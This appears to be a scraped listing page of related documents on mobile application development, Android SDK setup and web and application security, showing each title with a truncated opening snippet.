Introduction to Mobile Access Gateway Installation

Introduction to Mobile Access Gateway Installation Introduction to Mobile Access Gateway Installation This document describes the installation process for the Mobile Access Gateway (MAG), which is an enterprise integration component that provides a secure

More information

Trend Micro Incorporated Research Paper 2012. Adding Android and Mac OS X Malware to the APT Toolbox

Trend Micro Incorporated Research Paper 2012. Adding Android and Mac OS X Malware to the APT Toolbox Trend Micro Incorporated Research Paper 2012 Adding Android and Mac OS X Malware to the APT Toolbox Contents Abstract... 1 Introduction... 1 Technical Analysis... 2 Remote Access Trojan Functionality...

More information

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP

More information

Enterprise Application Security Workshop Series

Enterprise Application Security Workshop Series Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants

More information

Android Developer Fundamental 1

Android Developer Fundamental 1 Android Developer Fundamental 1 I. Why Learn Android? Technology for life. Deep interaction with our daily life. Mobile, Simple & Practical. Biggest user base (see statistics) Open Source, Control & Flexibility

More information

ADOBE AIR HTML Security

ADOBE AIR HTML Security ADOBE AIR HTML Security Legal notices Legal notices For legal notices, see http://help.adobe.com/en_us/legalnotices/index.html. iii Contents The security challenges of RIAs.........................................................................................

More information

elearning for Secure Application Development

elearning for Secure Application Development elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security

More information

Advertiser Campaign SDK Your How-to Guide

Advertiser Campaign SDK Your How-to Guide Advertiser Campaign SDK Your How-to Guide Using Leadbolt Advertiser Campaign SDK with Android Apps Version: Adv2.03 Copyright 2012 Leadbolt All rights reserved Disclaimer This document is provided as-is.

More information

Penetration from application down to OS

Penetration from application down to OS April 8, 2009 Penetration from application down to OS Getting OS access using IBM Websphere Application Server vulnerabilities Digitаl Security Research Group (DSecRG) Stanislav Svistunovich research@dsecrg.com

More information

Silk Test 17.0. Testing Mobile Applications

Silk Test 17.0. Testing Mobile Applications Silk Test 17.0 Testing Mobile Applications Micro Focus The Lawn 22-30 Old Bath Road Newbury, Berkshire RG14 1QN UK http://www.microfocus.com Copyright Micro Focus 1992-2016. All rights reserved. MICRO

More information

Introduction to IBM Worklight Mobile Platform

Introduction to IBM Worklight Mobile Platform Introduction to IBM Worklight Mobile Platform The Worklight Mobile Platform The Worklight Mobile Platform is an open, complete and advanced mobile application platform for HTML5, hybrid and native apps.

More information

Cross-platform Programming Lecture 3

Cross-platform Programming Lecture 3 Crossplatform Programming Lecture 3 Introduction to Titanium http://dsg.ce.unipr.it/ http://dsg.ce.unipr.it/?q=node/37 alessandro.grazioli81@gmail.com 2015 Parma Outline Introduction Installation and Configuration

More information

Still Aren't Doing. Frank Kim

Still Aren't Doing. Frank Kim Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding

More information

Pwning Intranets with HTML5

Pwning Intranets with HTML5 Javier Marcos de Prado Juan Galiana Lara Pwning Intranets with HTML5 2009 IBM Corporation Agenda How our attack works? How we discover what is in your network? What does your infrastructure tell us for

More information

Simplifying and Empowering the Implementation of Enterprise Mobile Strategy

Simplifying and Empowering the Implementation of Enterprise Mobile Strategy mfrontiers white paper November 2013 Enterprise Mobility Management Platform with Simplifying and Empowering the Implementation of Enterprise Mobile Strategy Page 1 of 9 Simplifying and Empowering the

More information

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London

More information

Android Environment SDK

Android Environment SDK Part 2-a Android Environment SDK Victor Matos Cleveland State University Notes are based on: Android Developers http://developer.android.com/index.html 1 Android Environment: Eclipse & ADT The Android

More information

Installation and configuration guide

Installation and configuration guide Installation and Configuration Guide Installation and configuration guide Adding X-Username support to Forward and Reverse Proxy TMG Servers Published: December 2010 Applies to: Winfrasoft X-Username for

More information

place/business fetch details, 184 185 removefromfavorite () function, 189 search button handler bind, 190 191 B BlackBerry build environment

place/business fetch details, 184 185 removefromfavorite () function, 189 search button handler bind, 190 191 B BlackBerry build environment Index A addtofavorite() method, 175 177, 188 189 Android ADT Plugin for Eclipse installation, 22 24 application, GWT Build Path, 244 device info, 247 directory structure, 244, 245 Eclipse classpath, 244

More information

Getting Started with the iscan Online Data Breach Risk Intelligence Platform

Getting Started with the iscan Online Data Breach Risk Intelligence Platform Getting Started with the iscan Online Data Breach Risk Intelligence Platform 2 Table of Contents Overview... 3 Data Breach Risk Intelligence... 3 Data Breach Prevention Lifecycle Defined... 3 Choosing

More information

Android Environment SDK

Android Environment SDK Part 2-a Android Environment SDK Victor Matos Cleveland State University Notes are based on: Android Developers http://developer.android.com/index.html 1 2A. Android Environment: Eclipse & ADT The Android

More information

WEB CONTENT SCANNER SDK

WEB CONTENT SCANNER SDK WEB CONTENT SCANNER SDK Web Content Inspection for PCs and Mobile OVERVIEW Web Content Scanner SDK is a multi-platform SDK that enables an application to filter websites based on web content at very high

More information

Internet Explorer Vulnerability (Remote Code Execution (CVE )

Internet Explorer Vulnerability (Remote Code Execution (CVE ) Internet Explorer Vulnerability (Remote Code Execution (CVE-2014-1776) MSS-SIEM Prepared By: Managed Service / Revision Number: 0.1 Date: 04/28/2014 Table of Contents Technical Summary... 3 Affected Versions...

More information

QUIRE: : Lightweight Provenance for Smart Phone Operating Systems

QUIRE: : Lightweight Provenance for Smart Phone Operating Systems QUIRE: : Lightweight Provenance for Smart Phone Operating Systems Dan S. Wallach Rice University Joint work with Mike Dietz, Yuliy Pisetsky, Shashi Shekhar, and Anhei Shu Android's security is awesome

More information

Learning Remote Control Framework ADD-ON for LabVIEW

Learning Remote Control Framework ADD-ON for LabVIEW Learning Remote Control Framework ADD-ON for LabVIEW TOOLS for SMART MINDS Abstract This document introduces the RCF (Remote Control Framework) ADD-ON for LabVIEW. Purpose of this article and the documents

More information

"EZHACK" POPULAR SMART TV DONGLE REMOTE CODE EXECUTION

EZHACK POPULAR SMART TV DONGLE REMOTE CODE EXECUTION "EZHACK" POPULAR SMART TV DONGLE REMOTE CODE EXECUTION CHECK POINT ALERTED EZCAST THAT ITS SMART TV DONGLE, WHICH IS USED BY APPROXIMATELY 5 MILLION USERS, IS EXPOSED TO SEVERE REMOTE CODE EXECUTION VULNERABILITIES

More information

Application security testing: Protecting your application and data

Application security testing: Protecting your application and data E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers

More information

Native, web or hybrid mobile-app development

Native, web or hybrid mobile-app development IBM Software Thought Leadership White Paper WebSphere Native, web or hybrid mobile-app development 2 Native, web or hybrid mobile-app development Contents 2 Introduction 2 Introducing the approaches 2

More information

Overview. The Android operating system is like a cake consisting of various layers.

Overview. The Android operating system is like a cake consisting of various layers. The Android Stack Overview The Android operating system is like a cake consisting of various layers. Each layer has its own characteristics and purpose but the layers are not always cleanly separated and

More information

Sandy. The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis. Garage4Hackers

Sandy. The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis. Garage4Hackers Sandy The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis About Me! I work as a Researcher for a Global Threat Research firm.! Spoke at the few security

More information

Kony Mobile Application Management (MAM)

Kony Mobile Application Management (MAM) Kony Mobile Application Management (MAM) Kony s Secure Mobile Application Management Feature Brief Contents What is Mobile Application Management? 3 Kony Mobile Application Management Solution Overview

More information

Cloud Services MDM. Overview & Setup Admin Guide

Cloud Services MDM. Overview & Setup Admin Guide Cloud Services MDM Overview & Setup Admin Guide 10/27/2014 CONTENTS Systems Overview... 2 Solution Overview... 2 System Requirements... 3 Admin Console Overview... 4 Logging into the Admin Console... 4

More information

Architecture and Data Flow Overview. BlackBerry Enterprise Service 10 721-08877-123 Version: 10.2. Quick Reference

Architecture and Data Flow Overview. BlackBerry Enterprise Service 10 721-08877-123 Version: 10.2. Quick Reference Architecture and Data Flow Overview BlackBerry Enterprise Service 10 721-08877-123 Version: Quick Reference Published: 2013-11-28 SWD-20131128130321045 Contents Key components of BlackBerry Enterprise

More information

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration

More information

The "Eclipse Classic" version is recommended. Otherwise, a Java or RCP version of Eclipse is recommended.

The Eclipse Classic version is recommended. Otherwise, a Java or RCP version of Eclipse is recommended. Installing the SDK This page describes how to install the Android SDK and set up your development environment for the first time. If you encounter any problems during installation, see the Troubleshooting

More information

About This Document 3. Integration and Automation Capabilities 4. Command-Line Interface (CLI) 8. API RPC Protocol 9.

About This Document 3. Integration and Automation Capabilities 4. Command-Line Interface (CLI) 8. API RPC Protocol 9. Parallels Panel Contents About This Document 3 Integration and Automation Capabilities 4 Command-Line Interface (CLI) 8 API RPC Protocol 9 Event Handlers 11 Panel Notifications 13 APS Packages 14 C H A

More information